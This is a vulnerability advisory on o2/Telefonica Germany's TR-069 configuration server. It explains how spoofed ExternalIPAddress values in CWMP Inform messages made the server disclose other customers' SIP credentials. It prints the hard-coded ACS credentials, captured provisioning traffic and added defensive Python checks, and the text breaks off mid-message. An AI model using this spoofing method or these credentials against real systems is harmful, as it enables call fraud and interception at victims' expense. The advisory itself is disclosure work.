Advisory: o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials
The o2 Auto Configuration Server (ACS) discloses VoIP/SIP credentials of
arbitrary customers when receiving manipulated CWMP packets. These
credentials can then be used by an attacker to register any VoIP number
of the victim. This enables the attacker to place and receive calls on
behalf of the attacked user.
Details
=======
Product: o2 DSL Auto Configuration Server
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://o2online.de/
Vendor Status: fixed
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-005
Advisory Status: published
CVE: not assigned
Introduction
============
TR-069 (Technical Report 069) is a Broadband Forum technical
specification entitled "CPE WAN Management Protocol" (CWMP). It defines
an application layer protocol for remote management of end-user devices.
(from Wikipedia)
A more technical introduction to TR-069 can be found in a deck of slides
which the Interoperability Laboratory at the University of New Hampshire
has published on that topic [0].
More Details
============
The German Internet Service Provider o2 uses the TR-069 protocol for the
provisioning of Customer Premises Equipment (CPE). Among other settings,
VoIP/SIP credentials are transferred and VoIP telephony is set up.
In our setup, an AVM FRITZ!Box 7490 was monitored during the initial
autoconfiguration process. During that process, several CWMP messages
are exchanged, transferred via HTTPS as SOAP requests and replies. The
HTTPS connection is always established by the CPE, which connects to the
Auto Configuration Server (ACS). According to the CWMP specification,
the CPE does so on the occasion of several events, including, but not
limited to:
* BOOTSTRAP - first contact between CPE and ACS
* BOOT - when the CPE has rebooted
* PERIODIC - after a period of time defined by the ACS
* CONNECTION REQUEST - the ACS signals a connection request to the CPE
via a second HTTP channel
The "CONNECTION REQUEST" is the only event that can be triggered by the
ACS. To do so, the ACS establishes an unencrypted HTTP connection to the
ConnectionRequestURL that the CPE reported in its Inform and
authenticates via HTTP basic access authentication with the
"ConnectionRequestUsername" and "ConnectionRequestPassword" it had set
on the CPE earlier. No further data is exchanged on that channel. Once
the CPE has verified the credentials, it initiates the real CWMP
conversation by sending a CWMP-Inform message to the pre-defined ACS.
This connection, initiated by the CPE, is TLS-secured, and the CPE
provides a username (ManagementServer.Username) and a password
(ManagementServer.Password) to authenticate itself to the ACS.
A typical CWMP conversation (including the "CONNECTION REQUEST" event)
is depicted below:
         .----------------Connection Request---------------.          ]
         |                                                 |          ]
         v                                                 |          ]
    ------------.                                          .--------  ]---> HTTP
    |Port|      |                                          |          ]
    |8089|      |                                          |          ]
    `----'      |                                          |   ACS    ]
         |      |                                          |
         |      |                                          |----.     ]
         `----> |  ---Inform------------------------>      |    |     ]
                |  <---InformResponse----------------      |    |     ]
                |                                          |    |     ]
                |  ---[empty]----------------------->      |    |     ]
                |  <---SetParameterValues------------      |    |     ]
                |                                          |    |     ]
                |  ---SetParameterValuesResponse---->      |Port|     ]---> CWMP
                |  <---SetParameterValues------------      | 443|     ] (HTTPS)
                |                                          |    |     ]
      CPE       |  [...]                                   |    |     ]
                |                                          |    |     ]
                |  ---SetParameterValuesResponse---->      |    |     ]
                |  <---[empty]-----------------------      |    |     ]
                |                                          |    |     ]
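The connection request leg of the diagram above, as an added example that
is not code from this advisory or from AVM or o2: a CPE-side handler that
parses the ACS's plain HTTP request, checks the path component of the
ConnectionRequestURL and the Basic credentials that the ACS set via
ConnectionRequestUsername/ConnectionRequestPassword, and only then returns
the event code the CPE would place into the Inform it opens towards the
ACS over HTTPS. The username and the path mirror [msg03] and [msg00]; the
password, the Host address, the status codes chosen for the failure cases
and the constant-time comparison are assumptions of this example.

```python
import base64
import hmac
from typing import Dict, Optional, Tuple

# Constructed CPE state for this example. The username mirrors what the ACS
# set in [msg03] (the CPE serial number) and the path mirrors the
# ConnectionRequestURL from [msg00]; the password is made up here.
CONNECTION_REQUEST_PATH = "/869f7018"
CONNECTION_REQUEST_USERNAME = "0896D776FAA2"
CONNECTION_REQUEST_PASSWORD = "constructed-example-secret"


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Split a minimal HTTP/1.x request into (method, path, headers).

    Header names are lower-cased. A body, if present, is ignored: a TR-069
    connection request carries no payload.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    request_line, *header_lines = head.split("\r\n")
    parts = request_line.split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, path, _version = parts
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def basic_credentials(authorization: Optional[str]) -> Optional[Tuple[str, str]]:
    """Decode an HTTP Basic Authorization header into (user, password)."""
    if not authorization or not authorization.lower().startswith("basic "):
        return None
    try:
        decoded = base64.b64decode(authorization[6:].strip(), validate=True)
        user, sep, password = decoded.decode("utf-8").partition(":")
    except (ValueError, UnicodeDecodeError):
        return None
    return (user, password) if sep else None


def _eq(a: str, b: str) -> bool:
    """Constant-time comparison so that mismatch position does not leak."""
    return hmac.compare_digest(a.encode("utf-8"), b.encode("utf-8"))


def handle_connection_request(raw: bytes) -> Tuple[int, Optional[str]]:
    """Return (HTTP status for the ACS, event code for the next Inform or None).

    Only a request with the right path and valid credentials makes the CPE
    schedule a "6 CONNECTION REQUEST" Inform; the HTTP channel itself never
    carries anything else.
    """
    method, path, headers = parse_http_request(raw)
    if method != "GET" or not _eq(path, CONNECTION_REQUEST_PATH):
        return 404, None
    creds = basic_credentials(headers.get("authorization"))
    if creds is None:
        return 401, None
    user, password = creds
    # Bitwise & evaluates both comparisons; a wrong user does not return early.
    if not (_eq(user, CONNECTION_REQUEST_USERNAME) & _eq(password, CONNECTION_REQUEST_PASSWORD)):
        return 401, None
    return 200, "6 CONNECTION REQUEST"


def build_connection_request(path: str, user: Optional[str] = None,
                             password: str = "") -> bytes:
    """Construct the request an ACS would send (example input, not captured traffic)."""
    lines = [f"GET {path} HTTP/1.1", "Host: 198.51.100.7:8089"]  # documentation address
    if user is not None:
        token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
        lines.append(f"Authorization: Basic {token}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


if __name__ == "__main__":
    ok = build_connection_request("/869f7018", "0896D776FAA2", "constructed-example-secret")
    print(handle_connection_request(ok))
    print(handle_connection_request(build_connection_request("/869f7018")))
```

The CPE answers the ACS with a bare status; everything of substance
happens afterwards on the HTTPS connection that the CPE opens.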
During our research, it was observed that the ACS URL as well as the
credentials for the initial connection to the ACS are hard-coded. On a
stock AVM FRITZ!Box running firmware version 6.20, these can be found in
the file ./providers/otwored/tr069.cfg, which is part of the archive
/etc/default.Fritz_Box_HW185/avm/providers-049.tar. For o2/Telefonica
these credentials are:
tr069cfg {
    enabled = yes;
    igd {
        DeviceInfo {
            ProvisioningCode = "";
        }
        managementserver {
            url = "https://acs.o2online.de/nbbs/tr69";
            username = "00040E-000000000000";
            password = "o2acs";
            URLAlreadyContacted = no;
            PeriodicInformEnable = yes;
            PeriodicInformInterval = 3600;
        }
    }
    FirmwareDownload {
        enabled = yes;
        enabled_converted = yes;
    }
    ACS_SSL {
        verify_server = yes;
        trusted_ca_file = "/etc/default/avm/root_ca.pem";
    }
    Download_SSL {
        verify_server = yes;
        trusted_ca_file = "/etc/default/avm/root_ca.pem";
    }
}
To ease the interaction with the ACS, a minimal TR-069 client was
implemented. With this rogue client it was possible to simulate the
behaviour of an AVM FRITZ!Box 7490 during the initial autoconfiguration
process. Thus, in the following description, the word "CPE" may equally
be read as "rogue client".
After the CPE connects to the ACS (see [msg00] in section Proof of
Concept), it gets configured to accept new credentials for incoming
connection requests:
* InternetGatewayDevice.ManagementServer.ConnectionRequestUsername
* InternetGatewayDevice.ManagementServer.ConnectionRequestPassword
(see [msg03])
The CPE is now capable of receiving connection requests from the ACS.
After several seconds, the ACS initiates a connection request and the
CPE starts a CWMP conversation (see [msg06]). During that conversation,
the ACS (ACS A) provides a new ACS URL (ACS B) together with a new set
of login credentials for ACS B:
* InternetGatewayDevice.ManagementServer.URL
* InternetGatewayDevice.ManagementServer.Username
* InternetGatewayDevice.ManagementServer.Password
* InternetGatewayDevice.ManagementServer.ConnectionRequestUsername
* InternetGatewayDevice.ManagementServer.ConnectionRequestPassword
(see [msg09])
Finally, the CPE is rebooted. From that point in time, all CWMP
conversation is directed to ACS B. On the occasion of the "BOOT" event,
the CPE connects to ACS B (see [msg12]) and receives the following
settings:
* InternetGatewayDevice.ManagementServer.PeriodicInformEnable
* InternetGatewayDevice.ManagementServer.PeriodicInformInterval
* InternetGatewayDevice.ManagementServer.PeriodicInformTime
(see [msg15])
After several seconds, the CPE again receives a connection request. It
connects to ACS B once more (see [msg18]) and receives the VoIP
credentials for all telephone numbers that are assigned to the customer:
* InternetGatewayDevice.Services.VoiceService.1.
VoiceProfile.1.Line.1.DirectoryNumber
* InternetGatewayDevice.Services.VoiceService.1.
VoiceProfile.1.Line.1.SIP.AuthUserName
* InternetGatewayDevice.Services.VoiceService.1.
VoiceProfile.1.Line.1.SIP.AuthPassword
* InternetGatewayDevice.Services.VoiceService.1.
VoiceProfile.1.Line.1.SIP.RegistrarServer
* InternetGatewayDevice.Services.VoiceService.1.
VoiceProfile.1.Line.1.SIP.OutboundProxy
(see [msg23])
The first digits of the AuthPassword are taken from the phone number
(compare AuthPassword and AuthUserName in [msg23]), so the password
carries less entropy than its length suggests.
In summary, the CPE has received VoIP credentials while it only supplied
the hard-coded login credentials for ACS A, which are shipped in the
stock firmware and are not specific to a customer. The ACS must
therefore have identified the CPE by its WAN IP address. It was further
determined that the ACS relies on the WAN/IPv4 address that the CPE
itself reports in the parameter
* InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
WANIPConnection.1.ExternalIPAddress
of its CWMP-Inform messages (see [msg00,06,12,18]), rather than on the
source address of the connection.
This parameter is under the attacker's control and may contain any IP
address. If an attacker sends such spoofed CWMP-Inform messages during
the whole two-step auto-provisioning process, the ACS returns the VoIP
credentials that are assigned to the IP address the attacker specified.
Additionally, any VoIP number issued by o2 may be registered from any o2
DSL account. Even if the number is already registered by the legitimate
customer's CPE, an attacker may register it a second time. Incoming
calls are then directed to both clients and may be answered by either of
them. Furthermore, this allows an attacker to place and receive phone
calls on behalf of any other customer. In consequence, the victim is
charged for any costs resulting from the abuse.
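The two observations above, the SIP parameters pushed by the ACS in a
SetParameterValues and the ACS trusting the self-reported
ExternalIPAddress, as one added example that is not code from this
advisory or from o2's ACS: a small parser for CWMP envelopes that undoes
the line wrapping used for the messages below, a helper that groups the
per-line VoIP parameters the way a monitor of one's own CPE traffic would,
and an ACS-side admission check of the kind the Workaround section
describes, which rejects an Inform whose claimed ExternalIPAddress differs
from the address the TLS connection actually came from. The sample
messages are constructed in the shape of [msg00] and [msg23] with made-up
values and addresses from the 198.51.100.0/24 documentation range; how
o2's ACS implements its own check is not known from this advisory.

```python
import ipaddress
import xml.etree.ElementTree as ET
from typing import Dict, Tuple

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
SOAP_ENC = "http://schemas.xmlsoap.org/soap/encoding/"
CWMP = "urn:dslforum-org:cwmp-1-0"
EXTERNAL_IP = ("InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1."
               "WANIPConnection.1.ExternalIPAddress")
LINE_PREFIX = "InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.Line."


def parse_cwmp(body: str) -> Tuple[str, str, Dict[str, str]]:
    """Return (RPC name, cwmp:ID, {parameter name: value}) for one CWMP envelope.

    Works for Inform and SetParameterValues alike. Whitespace inside <Name> is
    removed and whitespace inside <Value> collapsed, which also undoes the line
    wrapping applied to the messages reproduced in this advisory.
    """
    root = ET.fromstring(body)
    cwmp_id = root.findtext(f"{{{SOAP_ENV}}}Header/{{{CWMP}}}ID", default="").strip()
    rpc = next(iter(root.find(f"{{{SOAP_ENV}}}Body")))  # the single RPC element
    params: Dict[str, str] = {}
    for pvs in rpc.iter("ParameterValueStruct"):
        name = "".join(pvs.findtext("Name", default="").split())
        params[name] = " ".join(pvs.findtext("Value", default="").split())
    return rpc.tag.split("}", 1)[1], cwmp_id, params


def sip_lines(params: Dict[str, str]) -> Dict[int, Dict[str, str]]:
    """Group the per-line VoIP parameters (DirectoryNumber, SIP.Auth*) by line index."""
    lines: Dict[int, Dict[str, str]] = {}
    for name, value in params.items():
        if name.startswith(LINE_PREFIX):
            index, _, rest = name[len(LINE_PREFIX):].partition(".")
            lines.setdefault(int(index), {})[rest] = value
    return lines


def admit_inform(body: str, peer_ip: str) -> Tuple[bool, str]:
    """ACS-side check: the self-reported ExternalIPAddress must equal the
    address the TLS connection came from. Returns (accepted, address or reason)."""
    rpc, _, params = parse_cwmp(body)
    if rpc != "Inform":
        return False, f"expected Inform, got {rpc}"
    claimed = params.get(EXTERNAL_IP)
    if claimed is None:
        return False, "no ExternalIPAddress reported"
    try:
        claimed_ip = ipaddress.ip_address(claimed)
    except ValueError:
        return False, f"ExternalIPAddress {claimed!r} is not an IP address"
    if claimed_ip != ipaddress.ip_address(peer_ip):
        return False, f"claimed {claimed} but connected from {peer_ip}"
    return True, str(claimed_ip)


def make_inform(external_ip: str, event: str = "0 BOOTSTRAP") -> str:
    """Constructed Inform in the shape of [msg00] (not captured traffic)."""
    return f"""<?xml version="1.0"?>
<soap:Envelope xmlns:soap="{SOAP_ENV}" xmlns:soap-enc="{SOAP_ENC}" xmlns:cwmp="{CWMP}"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Header><cwmp:ID soap:mustUnderstand="1">100</cwmp:ID></soap:Header>
<soap:Body><cwmp:Inform>
<DeviceId><Manufacturer>AVM</Manufacturer><OUI>00040E</OUI><ProductClass>FRITZ!Box</ProductClass><SerialNumber>0896D776FAA2</SerialNumber></DeviceId>
<Event soap-enc:arrayType="cwmp:EventStruct[1]"><EventStruct><EventCode>{event}</EventCode><CommandKey/></EventStruct></Event>
<MaxEnvelopes>1</MaxEnvelopes><CurrentTime>2014-09-08T18:27:32+02:00</CurrentTime><RetryCount>0</RetryCount>
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[2]">
<ParameterValueStruct><Name>InternetGatewayDevice.ManagementServer.ConnectionRequestURL</Name>
<Value xsi:type="xsd:string">http://{external_ip}:8089/869f7018</Value></ParameterValueStruct>
<ParameterValueStruct><Name>
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
WANIPConnection.1.ExternalIPAddress
</Name><Value xsi:type="xsd:string">{external_ip}</Value></ParameterValueStruct>
</ParameterList></cwmp:Inform></soap:Body></soap:Envelope>"""


# Constructed SetParameterValues in the shape of [msg23]; all values are made up.
SAMPLE_VOIP_SPV = f"""<?xml version="1.0"?>
<soapenv:Envelope xmlns:soapenv="{SOAP_ENV}" xmlns:soap="{SOAP_ENC}" xmlns:cwmp="{CWMP}"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soapenv:Header><cwmp:ID soapenv:mustUnderstand="1">393158501</cwmp:ID></soapenv:Header>
<soapenv:Body><cwmp:SetParameterValues>
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[4]">
<ParameterValueStruct><Name>InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.1.SIP.RegistrarServer</Name>
<Value xsi:type="xsd:string">sip.example.net</Value></ParameterValueStruct>
<ParameterValueStruct><Name>{LINE_PREFIX}1.DirectoryNumber</Name>
<Value xsi:type="xsd:string">5550100</Value></ParameterValueStruct>
<ParameterValueStruct><Name>
{LINE_PREFIX}
1.SIP.AuthUserName
</Name><Value xsi:type="xsd:string">49555510000</Value></ParameterValueStruct>
<ParameterValueStruct><Name>
{LINE_PREFIX}
1.SIP.AuthPassword
</Name><Value xsi:type="xsd:string">05555100000xyz</Value></ParameterValueStruct>
</ParameterList><ParameterKey>39315850</ParameterKey>
</cwmp:SetParameterValues></soapenv:Body></soapenv:Envelope>"""
```

Run against the real messages below, parse_cwmp() yields the same
name/value pairs the text lists for [msg23]; admit_inform() is the piece
that was missing on the ACS side, since the attack only works when the
ACS looks up the subscriber by the claimed address without comparing it
to the peer address.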
Proof of Concept
================
As a proof of concept, the CWMP conversation that was captured during
the auto-provisioning of an AVM FRITZ!Box 7490 (firmware 6.20) is given
below. Each message is the body of an HTTPS POST request (CPE to ACS) or
of the corresponding HTTPS response (ACS to CPE). Some messages have
been wrapped for better readability.
Communication with ACS A:
------------------------------------------------------------------------
[msg00] CPE -> ACS A:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">100</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:Inform>
<DeviceId>
<Manufacturer>AVM</Manufacturer>
<OUI>00040E</OUI>
<ProductClass>FRITZ!Box</ProductClass>
<SerialNumber>0896D776FAA2</SerialNumber>
</DeviceId>
<Event soap-enc:arrayType="cwmp:EventStruct[2]">
<EventStruct>
<EventCode>1 BOOT</EventCode>
<CommandKey/>
</EventStruct>
<EventStruct>
<EventCode>0 BOOTSTRAP</EventCode>
<CommandKey/>
</EventStruct>
</Event>
<MaxEnvelopes>1</MaxEnvelopes>
<CurrentTime>2014-09-08T18:27:32+02:00</CurrentTime>
<RetryCount>0</RetryCount>
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceSummary</Name>
<Value xsi:type="xsd:string">
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,
VolumeConfig:1)
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>
<Value xsi:type="xsd:string">113.06.20</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>
<Value xsi:type="xsd:string">1.0</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>
<Value xsi:type="xsd:string"/>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ParameterKey
</Name>
<Value xsi:type="xsd:string"/>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ConnectionRequestURL
</Name>
<Value xsi:type="xsd:string">
http://78.48.x.x:8089/869f7018
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
WANIPConnection.1.ExternalIPAddress
</Name>
<Value xsi:type="xsd:string">78.48.x.x</Value>
</ParameterValueStruct>
</ParameterList>
</cwmp:Inform>
</soap:Body>
</soap:Envelope>
[msg01] CPE <- ACS A:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">100</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:InformResponse>
<MaxEnvelopes>1</MaxEnvelopes>
</cwmp:InformResponse>
</soapenv:Body>
</soapenv:Envelope>
[msg02] CPE -> ACS A:
---------------------
[empty]
[msg03] CPE <- ACS A:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">null0</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:SetParameterValues>
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[4]">
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.PeriodicInformEnable
</Name>
<Value xsi:type="xsd:boolean">1</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.
ConnectionRequestUsername
</Name>
<Value xsi:type="xsd:string">0896D776FAA2</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.
ConnectionRequestPassword</Name>
<Value xsi:type="xsd:string">
57d29f69eca7b5ca484e4644bf9720
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.
PeriodicInformInterval
</Name>
<Value xsi:type="xsd:unsignedInt">200</Value>
</ParameterValueStruct>
</ParameterList>
<ParameterKey>null</ParameterKey>
</cwmp:SetParameterValues>
</soapenv:Body>
</soapenv:Envelope>
[msg04] CPE -> ACS A:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">null0</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:SetParameterValuesResponse>
<Status>0</Status>
</cwmp:SetParameterValuesResponse>
</soap:Body>
</soap:Envelope>
[msg05] CPE <- ACS A:
---------------------
[empty]
[msg06] CPE -> ACS A:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">null0</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:Inform>
<DeviceId>
<Manufacturer>AVM</Manufacturer>
<OUI>00040E</OUI>
<ProductClass>FRITZ!Box</ProductClass>
<SerialNumber>0896D776FAA2</SerialNumber>
</DeviceId>
<Event soap-enc:arrayType="cwmp:EventStruct[1]">
<EventStruct>
<EventCode>6 CONNECTION REQUEST</EventCode>
<CommandKey/>
</EventStruct>
</Event>
<MaxEnvelopes>1</MaxEnvelopes>
<CurrentTime>2014-09-08T18:27:34+02:00</CurrentTime>
<RetryCount>0</RetryCount>
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceSummary</Name>
<Value xsi:type="xsd:string">
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,
VolumeConfig:1)
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>
<Value xsi:type="xsd:string">113.06.20</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>
<Value xsi:type="xsd:string">1.0</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>
<Value xsi:type="xsd:string"/>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ParameterKey
</Name>
<Value xsi:type="xsd:string">null</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ConnectionRequestURL
</Name>
<Value xsi:type="xsd:string">
http://78.48.x.x:8089/869f7018
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
WANIPConnection.1.ExternalIPAddress
</Name>
<Value xsi:type="xsd:string">78.48.x.x</Value>
</ParameterValueStruct>
</ParameterList>
</cwmp:Inform>
</soap:Body>
</soap:Envelope>
[msg07] CPE <- ACS A:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">null0</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:InformResponse>
<MaxEnvelopes>1</MaxEnvelopes>
</cwmp:InformResponse>
</soapenv:Body>
</soapenv:Envelope>
[msg08] CPE -> ACS A:
---------------------
[empty]
[msg09] CPE <- ACS A:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">393158460</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:SetParameterValues>
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[5]">
<ParameterValueStruct>
<Name>InternetGatewayDevice.ManagementServer.URL</Name>
<Value xsi:type="xsd:string">
https://hdm.o2online.de:443/cwmpWeb/CPEMgt
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.ManagementServer.Username</Name>
<Value xsi:type="xsd:string">0896D776FAA2</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.ManagementServer.Password</Name>
<Value xsi:type="xsd:string">1410193655111a</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.
ConnectionRequestUsername
</Name>
<Value xsi:type="xsd:string">0896D776FAA2</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.
ConnectionRequestPassword
</Name>
<Value xsi:type="xsd:string">1410193655111a</Value>
</ParameterValueStruct>
</ParameterList>
<ParameterKey>39315846</ParameterKey>
</cwmp:SetParameterValues>
</soapenv:Body>
</soapenv:Envelope>
[msg10] CPE -> ACS A:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">393158460</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:SetParameterValuesResponse>
<Status>0</Status>
</cwmp:SetParameterValuesResponse>
</soap:Body>
</soap:Envelope>
[msg11] CPE <- ACS A:
---------------------
initializeSession:null
------------------------------------------------------------------------
Communication with ACS B:
------------------------------------------------------------------------
[msg12] CPE -> ACS B:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">393158460</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:Inform>
<DeviceId>
<Manufacturer>AVM</Manufacturer>
<OUI>00040E</OUI>
<ProductClass>FRITZ!Box</ProductClass>
<SerialNumber>0896D776FAA2</SerialNumber>
</DeviceId>
<Event soap-enc:arrayType="cwmp:EventStruct[2]">
<EventStruct>
<EventCode>1 BOOT</EventCode>
<CommandKey/>
</EventStruct>
<EventStruct>
<EventCode>0 BOOTSTRAP</EventCode>
<CommandKey/>
</EventStruct>
</Event>
<MaxEnvelopes>1</MaxEnvelopes>
<CurrentTime>2014-09-08T18:27:35+02:00</CurrentTime>
<RetryCount>0</RetryCount>
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceSummary</Name>
<Value xsi:type="xsd:string">
